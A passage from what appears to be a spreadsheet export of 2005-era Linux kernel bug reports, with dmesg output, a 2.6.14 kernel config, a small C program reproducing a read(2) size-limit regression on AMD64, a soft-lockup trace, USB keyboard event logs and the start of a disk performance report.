Disabled Privacy Extensions on device ffffffff80455140(lo) [ 45.839859] IPv6 over IPv4 tunneling driver [ 51.225124] eth0: no IPv6 routers present [ 6730.963410] APIC error on CPU0: 00(40) [ 6730.964617] APIC error on CPU1: 00(40) [ 9733.619716] APIC error on CPU1: 40(40) [ 9733.617985] APIC error on CPU0: 40(40) [10532.848310] APIC error on CPU0: 40(40) [10532.850196] APIC error on CPU1: 40(40) [20364.592866] APIC error on CPU0: 40(40) [20364.596445] APIC error on CPU1: 40(40) [20897.436743] APIC error on CPU1: 40(40) [20897.433066] APIC error on CPU0: 40(40) [33998.202344] APIC error on CPU0: 40(40) [33998.208436] APIC error on CPU1: 40(40) [34719.416333] APIC error on CPU0: 40(40) [34719.422588] APIC error on CPU1: 40(40) [34719.426319] APIC error on CPU0: 40(40) &lt;snip&gt; kernel config: # # Automatically generated make config: don't edit # Linux kernel version: 2.6.14 # Fri Nov 4 14:04:11 2005 # CONFIG_X86_64=y CONFIG_64BIT=y CONFIG_X86=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_MMU=y CONFIG_RWSEM_GENERIC_SPINLOCK=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_CMPXCHG=y CONFIG_EARLY_PRINTK=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_BSD_PROCESS_ACCT_V3=y CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_HOTPLUG=y CONFIG_KOBJECT_UEVENT=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_CPUSETS is not set CONFIG_INITRAMFS_SOURCE="" # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_SHMEM=y CONFIG_CC_ALIGN_FUNCTIONS=0 CONFIG_CC_ALIGN_LABELS=0 CONFIG_CC_ALIGN_LOOPS=0 CONFIG_CC_ALIGN_JUMPS=0 # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_MODULE_SRCVERSION_ALL=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y # # Processor type and features # CONFIG_MK8=y # CONFIG_MPSC is not set # CONFIG_GENERIC_CPU is not set CONFIG_X86_L1_CACHE_BYTES=64 CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_MICROCODE=m CONFIG_X86_MSR=m CONFIG_X86_CPUID=m CONFIG_X86_IO_APIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_MTRR=y CONFIG_SMP=y # CONFIG_SCHED_SMT is not set CONFIG_PREEMPT_NONE=y # CONFIG_PREEMPT_VOLUNTARY is not set # CONFIG_PREEMPT is not set # CONFIG_PREEMPT_BKL is not set CONFIG_K8_NUMA=y # CONFIG_NUMA_EMU is not set CONFIG_ARCH_DISCONTIGMEM_ENABLE=y CONFIG_NUMA=y CONFIG_ARCH_DISCONTIGMEM_DEFAULT=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_SELECT_MEMORY_MODEL=y # CONFIG_FLATMEM_MANUAL is not set CONFIG_DISCONTIGMEM_MANUAL=y # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_DISCONTIGMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_NEED_MULTIPLE_NODES=y # CONFIG_SPARSEMEM_STATIC is not set CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID=y CONFIG_NR_CPUS=2 # CONFIG_HOTPLUG_CPU is not set CONFIG_HPET_TIMER=y CONFIG_X86_PM_TIMER=y CONFIG_HPET_EMULATE_RTC=y CONFIG_GART_IOMMU=y CONFIG_SWIOTLB=y CONFIG_X86_MCE=y CONFIG_X86_MCE_INTEL=y CONFIG_PHYSICAL_START=0x100000 # CONFIG_KEXEC is not set CONFIG_SECCOMP=y CONFIG_HZ_100=y # CONFIG_HZ_250 is not set # CONFIG_HZ_1000 is not set CONFIG_HZ=100 CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_ISA_DMA_API=y CONFIG_GENERIC_PENDING_IRQ=y # # Power management options # CONFIG_PM=y # CONFIG_PM_DEBUG is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y # CONFIG_ACPI_AC is not set # CONFIG_ACPI_BATTERY is not set CONFIG_ACPI_BUTTON=y CONFIG_ACPI_VIDEO=y # CONFIG_ACPI_HOTKEY is not set CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_NUMA=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_IBM is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y # CONFIG_ACPI_CONTAINER is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI etc.) # CONFIG_PCI=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_MMCONFIG is not set # CONFIG_UNORDERED_IO is not set CONFIG_PCIEPORTBUS=y # CONFIG_PCI_MSI is not set CONFIG_PCI_LEGACY_PROC=y # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats / Emulations # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m CONFIG_IA32_EMULATION=y CONFIG_IA32_AOUT=y CONFIG_COMPAT=y CONFIG_SYSVIPC_COMPAT=y CONFIG_UID16=y # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=m CONFIG_PACKET_MMAP=y CONFIG_UNIX=m CONFIG_XFRM=y CONFIG_XFRM_USER=m CONFIG_NET_KEY=m CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_ASK_IP_FIB_HASH=y # CONFIG_IP_FIB_TRIE is not set CONFIG_IP_FIB_HASH=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_MULTIPATH_CACHED=y CONFIG_IP_ROUTE_MULTIPATH_RR=m CONFIG_IP_ROUTE_MULTIPATH_RANDOM=m CONFIG_IP_ROUTE_MULTIPATH_WRANDOM=m CONFIG_IP_ROUTE_MULTIPATH_DRR=m CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m CONFIG_NET_IPGRE_BROADCAST=y CONFIG_IP_MROUTE=y CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y # CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m CONFIG_INET_TUNNEL=m CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_BIC=y # # IP: Virtual Server Configuration # CONFIG_IP_VS=m # CONFIG_IP_VS_DEBUG is not set CONFIG_IP_VS_TAB_BITS=12 # # IPVS transport protocol load balancing support # CONFIG_IP_VS_PROTO_TCP=y CONFIG_IP_VS_PROTO_UDP=y CONFIG_IP_VS_PROTO_ESP=y CONFIG_IP_VS_PROTO_AH=y # # IPVS scheduler # CONFIG_IP_VS_RR=m CONFIG_IP_VS_WRR=m CONFIG_IP_VS_LC=m CONFIG_IP_VS_WLC=m CONFIG_IP_VS_LBLC=m CONFIG_IP_VS_LBLCR=m CONFIG_IP_VS_DH=m CONFIG_IP_VS_SH=m CONFIG_IP_VS_SED=m CONFIG_IP_VS_NQ=m # # IPVS application helper # CONFIG_IP_VS_FTP=m CONFIG_IPV6=m CONFIG_IPV6_PRIVACY=y CONFIG_INET6_AH=m CONFIG_INET6_ESP=m CONFIG_INET6_IPCOMP=m CONFIG_INET6_TUNNEL=m CONFIG_IPV6_TUNNEL=m CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_BRIDGE_NETFILTER=y CONFIG_NETFILTER_NETLINK=m CONFIG_NETFILTER_NETLINK_QUEUE=m CONFIG_NETFILTER_NETLINK_LOG=m # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_CT_ACCT=y CONFIG_IP_NF_CONNTRACK_MARK=y # CONFIG_IP_NF_CONNTRACK_EVENTS is not set CONFIG_IP_NF_CONNTRACK_NETLINK=m CONFIG_IP_NF_CT_PROTO_SCTP=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_NETBIOS_NS=m CONFIG_IP_NF_TFTP=m CONFIG_IP_NF_AMANDA=m CONFIG_IP_NF_PPTP=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_PHYSDEV=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_MATCH_REALM=m CONFIG_IP_NF_MATCH_SCTP=m # CONFIG_IP_NF_MATCH_DCCP is not set CONFIG_IP_NF_MATCH_COMMENT=m CONFIG_IP_NF_MATCH_CONNMARK=m CONFIG_IP_NF_MATCH_CONNBYTES=m CONFIG_IP_NF_MATCH_HASHLIMIT=m CONFIG_IP_NF_MATCH_STRING=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_TARGET_NFQUEUE=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m CONFIG_IP_NF_TARGET_NETMAP=m CONFIG_IP_NF_TARGET_SAME=m CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_NAT_AMANDA=m CONFIG_IP_NF_NAT_PPTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_CLASSIFY=m CONFIG_IP_NF_TARGET_TTL=m CONFIG_IP_NF_TARGET_CONNMARK=m CONFIG_IP_NF_TARGET_CLUSTERIP=m CONFIG_IP_NF_RAW=m CONFIG_IP_NF_TARGET_NOTRACK=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m # # IPv6: Netfilter Configuration (EXPERIMENTAL) # CONFIG_IP6_NF_QUEUE=m CONFIG_IP6_NF_IPTABLES=m CONFIG_IP6_NF_MATCH_LIMIT=m CONFIG_IP6_NF_MATCH_MAC=m CONFIG_IP6_NF_MATCH_RT=m CONFIG_IP6_NF_MATCH_OPTS=m CONFIG_IP6_NF_MATCH_FRAG=m CONFIG_IP6_NF_MATCH_HL=m CONFIG_IP6_NF_MATCH_MULTIPORT=m CONFIG_IP6_NF_MATCH_OWNER=m CONFIG_IP6_NF_MATCH_MARK=m CONFIG_IP6_NF_MATCH_IPV6HEADER=m CONFIG_IP6_NF_MATCH_AHESP=m CONFIG_IP6_NF_MATCH_LENGTH=m CONFIG_IP6_NF_MATCH_EUI64=m CONFIG_IP6_NF_MATCH_PHYSDEV=m CONFIG_IP6_NF_FILTER=m CONFIG_IP6_NF_TARGET_LOG=m CONFIG_IP6_NF_TARGET_REJECT=m CONFIG_IP6_NF_TARGET_NFQUEUE=m CONFIG_IP6_NF_MANGLE=m CONFIG_IP6_NF_TARGET_MARK=m CONFIG_IP6_NF_TARGET_HL=m CONFIG_IP6_NF_RAW=m # # Bridge: Netfilter Configuration # CONFIG_BRIDGE_NF_EBTABLES=m CONFIG_BRIDGE_EBT_BROUTE=m CONFIG_BRIDGE_EBT_T_FILTER=m CONFIG_BRIDGE_EBT_T_NAT=m CONFIG_BRIDGE_EBT_802_3=m CONFIG_BRIDGE_EBT_AMONG=m CONFIG_BRIDGE_EBT_ARP=m CONFIG_BRIDGE_EBT_IP=m CONFIG_BRIDGE_EBT_LIMIT=m CONFIG_BRIDGE_EBT_MARK=m CONFIG_BRIDGE_EBT_PKTTYPE=m CONFIG_BRIDGE_EBT_STP=m CONFIG_BRIDGE_EBT_VLAN=m CONFIG_BRIDGE_EBT_ARPREPLY=m CONFIG_BRIDGE_EBT_DNAT=m CONFIG_BRIDGE_EBT_MARK_T=m CONFIG_BRIDGE_EBT_REDIRECT=m CONFIG_BRIDGE_EBT_SNAT=m CONFIG_BRIDGE_EBT_LOG=m CONFIG_BRIDGE_EBT_ULOG=m # # DCCP Configuration (EXPERIMENTAL) # # CONFIG_IP_DCCP is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IP_SCTP=m # CONFIG_SCTP_DBG_MSG is not set # CONFIG_SCTP_DBG_OBJCNT is not set # CONFIG_SCTP_HMAC_NONE is not set # CONFIG_SCTP_HMAC_SHA1 is not set CONFIG_SCTP_HMAC_MD5=y CONFIG_ATM=y CONFIG_ATM_CLIP=m # CONFIG_ATM_CLIP_NO_ICMP is not set # CONFIG_ATM_LANE is not set # CONFIG_ATM_BR2684 is not set CONFIG_BRIDGE=m CONFIG_VLAN_8021Q=m # CONFIG_DECNET is not set CONFIG_LLC=m CONFIG_LLC2=m CONFIG_IPX=m # CONFIG_IPX_INTERN is not set CONFIG_ATALK=m CONFIG_DEV_APPLETALK=y CONFIG_IPDDP=m CONFIG_IPDDP_ENCAP=y CONFIG_IPDDP_DECAP=y # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set CONFIG_WAN_ROUTER=m CONFIG_NET_SCHED=y CONFIG_NET_SCH_CLK_JIFFIES=y # CONFIG_NET_SCH_CLK_GETTIMEOFDAY is not set # CONFIG_NET_SCH_CLK_CPU is not set CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_HFSC=m CONFIG_NET_SCH_ATM=m CONFIG_NET_SCH_PRIO=m CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m CONFIG_NET_SCH_NETEM=m CONFIG_NET_SCH_INGRESS=m CONFIG_NET_QOS=y CONFIG_NET_ESTIMATOR=y CONFIG_NET_CLS=y CONFIG_NET_CLS_BASIC=m CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_CLS_U32_PERF is not set # CONFIG_NET_CLS_IND is not set CONFIG_CLS_U32_MARK=y CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m CONFIG_NET_EMATCH=y CONFIG_NET_EMATCH_STACK=32 CONFIG_NET_EMATCH_CMP=m CONFIG_NET_EMATCH_NBYTE=m CONFIG_NET_EMATCH_U32=m CONFIG_NET_EMATCH_META=m CONFIG_NET_EMATCH_TEXT=m # CONFIG_NET_CLS_ACT is not set CONFIG_NET_CLS_POLICE=y # # Network testing # CONFIG_NET_PKTGEN=m # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_IEEE80211=m # CONFIG_IEEE80211_DEBUG is not set # CONFIG_IEEE80211_CRYPT_WEP is not set CONFIG_IEEE80211_CRYPT_CCMP=m CONFIG_IEEE80211_CRYPT_TKIP=m # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=m # # Connector - unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_SERIAL=m CONFIG_PARPORT_PC_FIFO=y # CONFIG_PARPORT_PC_SUPERIO is not set CONFIG_PARPORT_NOT_PC=y # CONFIG_PARPORT_GSC is not set CONFIG_PARPORT_1284=y # # Plug and Play support # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=m CONFIG_PARIDE=m CONFIG_PARIDE_PARPORT=m # # Parallel IDE high-level drivers # CONFIG_PARIDE_PD=m CONFIG_PARIDE_PCD=m CONFIG_PARIDE_PF=m CONFIG_PARIDE_PT=m CONFIG_PARIDE_PG=m # # Parallel IDE protocol modules # CONFIG_PARIDE_ATEN=m CONFIG_PARIDE_BPCK=m CONFIG_PARIDE_COMM=m CONFIG_PARIDE_DSTR=m CONFIG_PARIDE_FIT2=m CONFIG_PARIDE_FIT3=m CONFIG_PARIDE_EPAT=m # CONFIG_PARIDE_EPATC8 is not set CONFIG_PARIDE_EPIA=m CONFIG_PARIDE_FRIQ=m CONFIG_PARIDE_FRPW=m CONFIG_PARIDE_KBIC=m CONFIG_PARIDE_KTTI=m CONFIG_PARIDE_ON20=m CONFIG_PARIDE_ON26=m # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set CONFIG_BLK_DEV_DAC960=m CONFIG_BLK_DEV_UMEM=m # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_SX8=m # CONFIG_BLK_DEV_UB is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_COUNT=16 CONFIG_BLK_DEV_RAM_SIZE=65536 CONFIG_BLK_DEV_INITRD=y CONFIG_LBD=y CONFIG_CDROM_PKTCDVD=m CONFIG_CDROM_PKTCDVD_BUFFERS=8 # CONFIG_CDROM_PKTCDVD_WCACHE is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y CONFIG_ATA_OVER_ETH=m # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=m # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDETAPE=m CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=y # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y CONFIG_BLK_DEV_CMD640=y # CONFIG_BLK_DEV_CMD640_ENHANCED is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y CONFIG_IDEDMA_ONLYDISK=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y CONFIG_BLK_DEV_ATIIXP=y # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set CONFIG_BLK_DEV_PDC202XX_OLD=m CONFIG_PDC202XX_BURST=y CONFIG_BLK_DEV_PDC202XX_NEW=m CONFIG_PDC202XX_FORCE=y # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # </t>
  </si>
  <si>
    <t>read/write does not check correctly the count</t>
  </si>
  <si>
    <t>2005-11-10 04:44 UTC</t>
  </si>
  <si>
    <t>2006-12-28 17:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.11-rc2 Distribution: Debian AMD64 Hardware Environment: bi-opteron server Software Environment: Problem Description: the system call read(2) return improperly an error if count is beyond INT_MAX, which is wrong on AMD64, since we have INT_MAX &lt; SSIZE_MAX (SSIZE_MAX being equal to LONG_MAX under AMD64). Steps to reproduce: 1- Create a big file (4Go) called big_file 2- Compile following program: -- CUT HERE #include &lt;fcntl.h&gt; #include &lt;limits.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #define THAT_SIZE (3l * 1024l * 1024l * 1024l) int main() { int fd; char *p; ssize_t s; p = malloc(THAT_SIZE); printf("THAT_SIZE: %ld\n", THAT_SIZE); printf("SSIZE_MAX: %ld\n", SSIZE_MAX); p = malloc(THAT_SIZE); if (!p) exit(1); fd = open("big_file", O_RDONLY); if (fd == -1) exit(1); s = read(fd, p, THAT_SIZE); close(fd); free(p); printf("bytes read: %ld\n", s); return 0; } On linux-2.6.11-rc2: $ ./a.out THAT_SIZE: 3221225472 SSIZE_MAX: 9223372036854775807 bytes read: 3221225472 which is correct. On linux-2.6.11-rc3 up to linux-2.6.14: $ ./a.out THAT_SIZE: 3221225472 SSIZE_MAX: 9223372036854775807 bytes read: -1</t>
  </si>
  <si>
    <t>2005-11-10 07:16 UTC</t>
  </si>
  <si>
    <t>Kamil Kaminski</t>
  </si>
  <si>
    <t>2006-07-31 08:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Slamd64 Hardware Environment: AMD Turion DL-30, SiS chipset (Acer AS5002WLMi) Software Environment: Problem Description: BUG: soft lockup detected on CPU#0! Steps to reproduce: Occurs when booting kernel. My DMESG below: ehci_hcd 0000:00:03.2: USB 2.0 initialized, EHCI 1.00, driver 10 Dec 2004 BUG: soft lockup detected on CPU#0! CPU 0: Modules linked in: Pid: 1, comm: swapper Not tainted 2.6.14-mh2 #3 RIP: 0010:[&lt;ffffffff8013b938&gt;] &lt;ffffffff8013b938&gt;{__do_softirq+72} RSP: 0000:ffffffff8073a858 EFLAGS: 00000206 RAX: ffff810017eadfd8 RBX: ffffffff8073a7a8 RCX: 0000000000000004 RDX: 0000000000000000 RSI: 000000000000006c RDI: ffff810017eab480 RBP: ffffffff8010e1c8 R08: 0000000000000002 R09: 0000000000000080 R10: 0000000000000001 R11: 0000000000000083 R12: 0000000000000292 R13: ffffffff801105ff R14: 0000000000000000 R15: 000000000000000a FS: 0000000000000000(0000) GS:ffffffff807d4800(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000000 CR3: 0000000000101000 CR4: 00000000000006e0 Call Trace: &lt;IRQ&gt; &lt;ffffffff8010ef3f&gt;{call_softirq+31} &lt;ffffffff80110641&gt;{do_softirq+49} &lt;ffffffff8010e7a6&gt;{apic_timer_interrupt+98} &lt;EOI&gt; &lt;ffffffff80548b55&gt;{_spin_unlock_irqrestore+5} &lt;ffffffff80136d52&gt;{vprintk+674} &lt;ffffffff8011d900&gt;{dma_alloc_pages+96} &lt;ffffffff80136e1d&gt;{printk+141} &lt;ffffffff8027d4b4&gt;{pci_bus_read_config_byte+116} &lt;ffffffff80144498&gt;{notifier_chain_register+72} &lt;ffffffff803f7b90&gt;{ehci_start+1136} &lt;ffffffff80270b32&gt;{kobject_get+18} &lt;ffffffff80270b6d&gt;{kobject_init+45} &lt;ffffffff80343eb1&gt;{device_initialize+49} &lt;ffffffff803e9847&gt;{usb_add_hcd+1015} &lt;ffffffff803f0eb3&gt;{usb_hcd_pci_probe+531} &lt;ffffffff80281cfc&gt;{pci_device_probe+252} &lt;ffffffff8034578f&gt;{driver_probe_device+79} &lt;ffffffff803458d9&gt;{__driver_attach+73} &lt;ffffffff80345890&gt;{__driver_attach+0} &lt;ffffffff80344cc9&gt;{bus_for_each_dev+73} &lt;ffffffff80345218&gt;{bus_add_driver+136} &lt;ffffffff80281a3d&gt;{pci_register_driver+125} &lt;ffffffff8010b249&gt;{init+505} &lt;ffffffff8010eaae&gt;{child_rip+8} &lt;ffffffff80286ce0&gt;{dummycon_dummy+0} &lt;ffffffff8010b050&gt;{init+0} &lt;ffffffff8010eaa6&gt;{child_rip+0} After this system starts normal</t>
  </si>
  <si>
    <t>USB Keycode produces button event</t>
  </si>
  <si>
    <t>2005-11-11 09:02 UTC</t>
  </si>
  <si>
    <t>Marvin Raaijmakers</t>
  </si>
  <si>
    <t>2008-09-22 16:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4? Distribution: Ubuntu, Mandriva, Debian Hardware Environment: x86 Software Environment: Problem Description: When I connect my Logitech Internet Navigator keyboard to the USB port and press the "Webcam" or the "Messenger/SMS" key, a mouse button event is generated. Output of evtest while pressing these keys: Event: time 1131728605.373550, -------------- Report Sync ------------ Event: time 1131728645.110743, type 4 (Misc), code 4 (ScanCode), value 90001 Event: time 1131728645.110751, type 1 (Key), code 256 (Btn0), value 1 Event: time 1131728645.110764, -------------- Report Sync ------------ Event: time 1131728645.238715, type 4 (Misc), code 4 (ScanCode), value 90001 Event: time 1131728645.238723, type 1 (Key), code 256 (Btn0), value 0 Event: time 1131728645.238731, -------------- Report Sync ------------ Event: time 1131728648.854096, type 4 (Misc), code 4 (ScanCode), value 90002 Event: time 1131728648.854104, type 1 (Key), code 257 (Btn1), value 1 Event: time 1131728648.854114, -------------- Report Sync ------------ Event: time 1131728649.014068, type 4 (Misc), code 4 (ScanCode), value 90002 Event: time 1131728649.014076, type 1 (Key), code 257 (Btn1), value 0 Event: time 1131728649.014088, -------------- Report Sync ------------</t>
  </si>
  <si>
    <t>Disk performance shot after upgrade to 2.6.1[34].*</t>
  </si>
  <si>
    <t>2005-11-11 09:41 UTC</t>
  </si>
  <si>
    <t>David Ronis</t>
  </si>
  <si>
    <t>2006-07-30 11:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.6 Distribution: Slackware-current &amp; frg-gnome Hardware Environment: HP Pavilion ZV5240CA laptop Software Environment: linux Problem Description: I've reported this on the linux-kernel list, where after some tests, I was referred to the linux-ide list. In short, adding ACPI=HT or ACPI=OFF at boot "fixes" the problem, although other things seem to break (I couldn't start X for example), and at this point I was advised to contact you here. Here's some information (interrupts, dmesg's lspci, hdparm tests). First for 2.6.12.6 cat /proc/interrupts CPU0 CPU1 0: 53375 1 IO-APIC-edge timer 1: 47 2 IO-APIC-edge i8042 5: 1 0 IO-APIC-level ATI IXP 8: 1 0 IO-APIC-edge rtc 12: 127 0 IO-APIC-edge i8042 14: 4970 0 IO-APIC-edge ide0 15: 